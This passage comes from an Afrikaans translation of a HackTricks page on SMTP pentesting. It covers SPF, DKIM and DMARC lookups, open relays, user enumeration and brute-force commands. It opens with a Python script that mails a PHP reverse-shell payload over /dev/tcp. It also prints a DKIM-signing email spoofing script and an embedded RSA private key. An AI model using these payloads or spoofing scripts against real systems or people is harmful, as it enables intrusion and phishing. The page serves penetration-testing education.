lhost = “127.0.0.1” lport = 443 rhost = “192.168.1.1” rport = 25 # 489,587

create message object instance

msg = MIMEMultipart()

setup the parameters of the message

password = “” msg[‘From’] = “attacker@local” msg[‘To’] = “victim@local” msg[‘Subject’] = “This is not a drill!”

payload

message = (“& /dev/tcp/%s/%d 0>&1'); ?>” % (lhost,lport))

print(“[*] Payload is generated : %s” % message)

msg.attach(MIMEText(message, ‘plain’)) server = smtplib.SMTP(host=rhost,port=rport)

if server.noop()[0] != 250: print(“[-]Connection Error”) exit()

server.starttls()

Uncomment if log-in with authencation

server.login(msg[‘From’], password)

server.sendmail(msg[‘From’], msg[‘To’], msg.as_string()) server.quit()

print(“[***]successfully sent email to %s:” % (msg[‘To’]))

</details>

## SMTP Smuggling

Die SMTP Smuggling kwesbaarheid het toegelaat om alle SMTP-beskermerings te omseil (kyk die volgende afdeling vir meer inligting oor beskerming). Vir meer inligting oor SMTP Smuggling kyk:

<a class="content_ref" href="smtp-smuggling.md"><span class="content_ref_label">SMTP Smuggling</span></a>

## Mail Spoofing Countermeasures

Organisasies word beskerm teen ongemagtigde e-posse wat namens hulle gestuur word deur die gebruik van **SPF**, **DKIM**, en **DMARC**, aangesien SMTP-boodskappe maklik nageboots kan word.

'n **Volledige gids tot hierdie teenmaatreëls** is beskikbaar by [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).

### SPF

> [!CAUTION]
> SPF [is in 2014 "deprecated" verklaar](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Dit beteken dat in plaas van om 'n **TXT record** in `_spf.domain.com` te skep jy dit in `domain.com` skep met dieselfde sintaksis.\
> Verder, om vorige spf-records te hergebruik is dit baie algemeen om iets soos `"v=spf1 include:_spf.google.com ~all"` te vind

**Sender Policy Framework** (SPF) is 'n meganisme wat Mail Transfer Agents (MTAs) toelaat om te verifieer of 'n gasheer wat 'n e-pos stuur, gemagtig is deur 'n lys van gemagtigde mail-bedieners wat deur die organisasie gedefinieer is, te raadpleeg. Hierdie lys, wat IP-adresse/-reekse, domeine en ander entiteite spesifiseer wat **gemagtig is om e-pos te stuur namens 'n domeinnaam**, sluit verskeie "**Meganismes**" in die SPF-record in.

#### Meganismes

Vanaf [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):

| Mechanism | Description                                                                                                                                                                                                                                                                                                                         |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL       | Kom altyd ooreen; word gebruik vir 'n standaardresultaat soos `-all` vir alle IP's wat nie deur vorige meganismes ooreenstem nie.                                                                                                                                                                                                 |
| A         | Indien die domeinnaam 'n adresse-record (A of AAAA) het wat na die sender se adres opgelos kan word, sal dit ooreenstem.                                                                                                                                                                                                                   |
| IP4       | Indien die sender binne 'n gegewe IPv4-adresreeks is, ooreenstem.                                                                                                                                                                                                                                                                              |
| IP6       | Indien die sender binne 'n gegewe IPv6-adresreeks is, ooreenstem.                                                                                                                                                                                                                                                                              |
| MX        | Indien die domeinnaam 'n MX-record het wat na die sender se adres oplos, sal dit ooreenstem (d.w.s. die e-pos kom van een van die domein se inkomende mailbedieners).                                                                                                                                                                          |
| PTR       | Indien die domeinnaam (PTR-record) vir die kliënt se adres binne die gegewe domein is en daardie domeinnaam na die kliënt se adres oplos (forward-confirmed reverse DNS), ooreenstem. Hierdie meganisme word ontmoedig en behoort vermy te word, indien moontlik.                                                                                     |
| EXISTS    | Indien die gegewe domeinnaam na enige adres oplos, ooreenstem (ongeag die adres waarna dit oplos). Dit word selde gebruik. Saam met die SPF-makrotaal bied dit meer komplekse ooreenkomste soos DNSBL-navrae.                                                                                                                           |
| INCLUDE   | Verwys na die beleid van 'n ander domein. Indien daardie domein se beleid slaag, slaag hierdie meganisme. Indien die ingeslote beleid egter misluk, gaan die verwerking voort. Om volledig aan 'n ander domein se beleid toe te ken, moet die redirect-uitbreiding gebruik word.                                                                                     |
| REDIRECT  | <p>'n redirect is 'n aanwyser na 'n ander domeinnaam wat 'n SPF-beleid huisves; dit maak dit moontlik vir verskeie domeine om dieselfde SPF-beleid te deel. Dit is nuttig wanneer daar met 'n groot aantal domeine gewerk word wat dieselfde e-pos-infrastruktuur deel.</p><p>Die SPF-beleid van die domein wat in die redirect-meganisme aangedui word, sal gebruik word.</p> |

Dit is ook moontlik om **Kwalifiseerders** te identifiseer wat aandui **wat gedoen moet word as 'n meganisme ooreenstem**. Standaard word die **kwalifiseerder "+"** gebruik (so as enige meganisme ooreenstem, beteken dit dit is toegelaat).\
Gewoonlik sal jy **aan die einde van elke SPF-beleid** iets soos: **\~all** of **-all** sien. Dit word gebruik om aan te dui dat **as die sender by geen SPF-beleid pas nie, jy die e-pos as onbetroubaar (\~) moet merk of die e-pos moet verwerp (-).**

#### Kwalifiseerders

Elk meganisme binne die beleid kan voorafgegaan word deur een van vier kwalifiseerders om die beoogde resultaat te definieer:

- **`+`**: Kom ooreen met 'n PASS-resultaat. Standaard neem meganismes hierdie kwalifiseerder aan, wat `+mx` ewewaardig aan `mx` maak.
- **`?`**: Verteenwoordig 'n NEUTRAL-resultaat, behandel soortgelyk aan NONE (geen spesifieke beleid nie).
- **`~`**: Dui SOFTFAIL aan, 'n middelgrond tussen NEUTRAL en FAIL. E-posse wat hierdie resultaat kry, word gewoonlik aanvaar maar ooreenkomstig gemerk.
- **`-`**: Dui FAIL aan, en suggereer dat die e-pos direk verwerp behoort te word.

In die volgende voorbeeld word die **SPF-beleid van google.com** geïllustreer. Let op die insluiting van SPF-beleide van verskillende domeine binne die eerste SPF-beleid:
```shell-session
dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"

dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"

dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"

dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"

dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"

Tradisioneel was dit moontlik om enige domeinnaam te spoof wat nie ’n korrekte/aanwesige SPF record gehad het nie. Deesdae, as e-pos van ’n domein sonder ’n geldige SPF record kom, sal dit waarskynlik outomaties verwerp/als onbetroubaar gemerk word.

To check the SPF of a domain you can use online tools like: https://www.kitterman.com/spf/validate.html

DKIM (DomainKeys Identified Mail)

DKIM word gebruik om uitgaande e-pos te onderteken, sodat dit deur eksterne Mail Transfer Agents (MTAs) gevalideer kan word deur die domein se publieke sleutel uit DNS te haal. Hierdie publieke sleutel is in die domein se TXT record geleë. Om toegang tot hierdie sleutel te kry, moet mens zowel die selector as die domeinnaam ken.

Byvoorbeeld, om die sleutel op te vra, is die domeinnaam en selector noodsaaklik. Hierdie kan in die mail header DKIM-Signature gevind word, bv. d=gmail.com;s=20120113.

’n kommando om hierdie inligting te haal kan soos volg lyk:

dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

DMARC (Domein-gebaseerde boodskapverifikasie, verslagdoening en nakoming)

DMARC verbeter e-possekuriteit deur voort te bou op die SPF- en DKIM-protokolle. Dit stel beleide vas wat mailservers rig in die hantering van e-pos vanaf ’n spesifieke domein, insluitend hoe om met verifikasiefoute te handel en waar om verslae oor e-posverwerkingsaksies te stuur.

Om die DMARC-rekord te bekom, moet jy navraag doen oor die subdomein _dmarc

# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com.	3600	IN	TXT	"v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"

# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"

# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"

DMARC-merkers

Wat van subdomeine?

Van hier.
Jy moet afsonderlike SPF-rekords hê vir elke subdomein van waar jy e-pos wil stuur.
Die volgende is oorspronklik op openspf.org gepos, wat vroeër ’n uitstekende bron vir hierdie soort dinge was.

Die Demon-vraag: Wat van subdomeine?

As ek e-pos kry van pielovers.demon.co.uk, en daar is geen SPF-data vir pielovers nie, moet ek dan een vlak teruggaan en SPF vir demon.co.uk toets? Nee. Elke subdomein by Demon is ’n ander klant, en elke klant kan sy eie beleid hê. Dit sou nie sin maak dat Demon se beleid standaard op al sy kliënte van toepassing is nie; as Demon dit wil doen, kan dit SPF-rekords vir elke subdomein opstel.

Dus die advies aan SPF-uitgewers is dit: jy moet ’n SPF-rekord byvoeg vir elke subdomein of hostnaam wat ’n A- of MX-rekord het.

Sites met wildcard A of MX-rekords moet ook ’n wildcard SPF-rekord hê, van die vorm: * IN TXT “v=spf1 -all”

Dit maak sin — ’n subdomein kan goed in ’n ander geografiese ligging wees en ’n heel ander SPF-definisie hê.

Open Relay

Wanneer e-posse gestuur word, is dit noodsaaklik om te verseker dat hulle nie as spam gemerk word nie. Dit word dikwels bereik deur die gebruik van ’n relay server wat deur die ontvanger vertrou word. Daarteenoor is daar ’n algemene probleem dat administrateurs nie altyd ten volle bewus is watter IP-reekse veilig is om toe te laat nie. Hierdie gebrek aan begrip kan lei tot foute by die opstel van die SMTP-bediener, ’n risiko wat gereeld in sekuriteitsassesseringe geïdentifiseer word.

’N Oplossing wat sommige administrateurs gebruik om e-posafleweringsprobleme te vermy, veral met betrekking tot kommunikasie met potensiële of huidige kliënte, is om verbindings van enige IP-adres toe te laat. Dit word gedoen deur die SMTP-bediener se mynetworks parameter te konfigureer om alle IP-adresse te aanvaar, soos hieronder getoon:

mynetworks = 0.0.0.0/0

Om te kontroleer of ’n e-posbediener ’n open relay is (wat beteken dat dit e-posse vanaf enige eksterne bron kan deurstuur), word die nmap-hulpmiddel algemeen gebruik. Dit sluit ’n spesifieke script in wat ontwerp is om dit te toets. Die opdrag om ’n verbose skandering op ’n bediener (byvoorbeeld met IP 10.10.10.10) op poort 25 met nmap uit te voer is:

nmap -p25 --script smtp-open-relay 10.10.10.10 -v

Gereedskap

• https://github.com/serain/mailspoof Kontroleer vir SPF- en DMARC-misconfigurasies
• https://pypi.org/project/checkdmarc/ Kry SPF- en DMARC-konfigurasies outomaties

Stuur Spoof Email

• https://www.mailsploit.com/index
• http://www.anonymailer.net/
• https://emkei.cz/

Of jy kan ’n hulpmiddel gebruik:

• https://github.com/magichk/magicspoofing

# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com

Warning

As jy enige fout by die gebruik van die dkim python lib kry wanneer die sleutel geparse word, kan jy gerus die volgende gebruik.
NOTE: Dit is net ’n vuil oplossing om vinnige kontroles te doen in gevalle waar om een of ander rede die openssl private sleutel nie deur dkim geparse kan word nie.

-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----

Of jy kan dit handmatig doen:

# This will send an unsigned message
mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");

# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py

import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase

# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]

# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")

# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
dkim_private_key = fh.read()

# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()

# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()

# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)

Meer inligting

Vind meer inligting oor hierdie beskermings by https://seanthegeek.net/459/demystifying-dmarc/

Ander phishing-aanwysers

• Domein se ouderdom
• Skakels wat na IP-adresse wys
• Skakelmanipulasie-tegnieke
• Verdagte (ongewone) aanhangsels
• Gebroke e-posinhoud
• Waarde wat gebruik word wat verskil van dié van die mail headers
• Bestaan van ’n geldige en vertroude SSL-sertifikaat
• Indiening van die bladsy by web content filtering-webwerwe

Exfiltration through SMTP

As jy data via SMTP kan stuur read this.

Konfigurasielêer

Postfix

Gewoonlik, as dit geïnstalleer is, bevat /etc/postfix/master.cf skripte om uit te voer wat byvoorbeeld uitgevoer word wanneer ’n nuwe e-pos deur ’n gebruiker ontvang word. Byvoorbeeld die reël flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient} beteken dat /etc/postfix/filtering uitgevoer sal word as ’n nuwe e-pos deur die gebruiker mark ontvang word.

Ander konfigurasielêers:

sendmail.cf
submit.cf

Verwysings

• https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/
• https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/
• 0xdf – HTB/VulnLab JobTwo: Word VBA macro phishing via SMTP → hMailServer credential decryption → Veeam CVE-2023-27532 to SYSTEM
• https://21ad.netlify.app/blogs/the-silent-inbox-how-verified-emails-slip-past-email-security-gateways/

HackTricks Outomatiese Kommando’s

Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
Port_Number:  25,465,587     #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html

Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25

Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}

Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}

Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587

Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}

Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V

Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.